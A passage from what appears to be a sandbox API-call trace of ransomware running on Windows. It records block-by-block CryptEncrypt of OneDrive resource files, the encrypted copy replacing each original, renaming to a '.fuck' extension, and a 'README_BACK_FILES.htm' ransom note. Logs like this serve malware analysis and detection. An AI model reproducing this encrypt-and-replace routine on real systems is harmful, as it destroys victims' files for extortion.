pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.121] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.122] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.122] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.122] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.122] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.122] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.122] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.122] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.122] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.122] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.122] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.122] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.122] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.123] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.123] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.123] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.123] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.123] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.123] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.123] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.123] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.123] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.123] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.123] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.123] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.123] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.124] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.124] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.124] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.124] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.124] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.124] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.124] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.124] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.124] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.124] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.124] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.124] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.124] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.124] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.125] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.125] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.125] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.125] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.125] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.125] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.125] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.125] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.125] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.125] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.125] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.125] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.126] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.126] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.126] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.126] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.126] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.126] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.126] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.126] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.126] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.126] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.126] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.126] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.127] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.127] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.127] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.127] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.127] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.127] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.127] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.128] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.128] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.128] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.128] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.128] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.128] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x48, lpOverlapped=0x0) returned 1 [0273.128] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x48, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x50) returned 1 [0273.128] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x50, lpOverlapped=0x0) returned 1 [0273.128] CloseHandle (hObject=0x5d48) returned 1 [0273.128] CloseHandle (hObject=0x5d4c) returned 1 [0273.129] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0273.135] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0273.135] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0273.137] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0273.138] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0273.138] CryptDestroyKey (hKey=0x2facc8) returned 1 [0273.138] CryptReleaseContext (hProv=0x2f28f58, dwFlags=0x0) returned 1 [0273.138] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0273.139] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0273.139] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\readme_back_files.htm")) returned 0xffffffff [0273.139] AreFileApisANSI () returned 1 [0273.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28895b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0273.139] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.140] GetFileType (hFile=0x5d3c) returned 0x1 [0273.140] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0273.141] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0273.141] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa748 [0273.142] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.142] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.142] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0273.142] GetLastError () returned 0x0 [0273.142] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\filesync.localizedresources.dll.mui")) returned 0x20 [0273.142] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0273.143] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0273.143] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, 